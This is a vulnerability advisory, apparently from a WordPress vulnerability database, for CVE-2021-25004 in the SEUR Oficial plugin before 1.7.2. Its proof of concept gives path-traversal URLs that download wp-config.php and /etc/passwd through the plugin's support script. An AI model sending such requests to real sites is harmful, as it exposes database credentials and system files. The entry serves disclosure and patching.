SEUR Oficial < 1.7.2 – Admin+ Arbitrary File Download | CVE 2021-25004 | Plugin Vulnerabilities

Description

The plugin creates a PHP file with a random name when installed, even though it is used for support purposes, it allows to download any file from the web server without restriction after knowing the URL and a password than an administrator can see in the plugin settings page.

Proof of Concept

Navigate to /wp-admin/admin.php?page=seur_status_page and grab the URL for the "Seur Download File URL" (seur-downloader-[random code].php) along with the "Seur Download Password"

Then just download any file you want via the following URL: 
* /wp-content/seur-downloader-[random code].php?label=../wp-config.php&label_name=../wp-config.php&pass=[password]

https://example.com/wp-content/seur-downloader-pgu8yjyt0a.php?label=/etc/passwd&label_name=/etc/passwd&pass=3fifyypfm5

Affects Plugins

Fixed in 1.7.2

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

José Aguilera

Submitter

José Aguilera

Submitter website

https://jsgm.dev

Verified

Yes

WPVDB ID

cfbc2b43-b8f8-4bcb-a3d3-39d217afa530

Timeline

Publicly Published

2022-01-10 (about 3 years ago)

Added

2022-01-10 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2025-07-23

Title

Security Ninja 5.201 - 5.242 - Admin+ Arbitrary File Read

Published

2022-08-17

Title

All-in-One Video Gallery 2.5.8 - 2.6.0 - Unauthenticated Arbitrary File Download & SSRF

Published

2025-09-03

Title

atec Debug < 1.2.23 - Admin+ Arbitrary File Read

Published

2025-12-11

Title

Secure Copy Content Protection and Content Locking < 4.9.3 - Unauthenticated Sensitive Information Exposure via Exposed CSV Export File

Published

2022-04-05

Title

Download Monitor < 4.5.91 - Admin+ Arbitrary File Download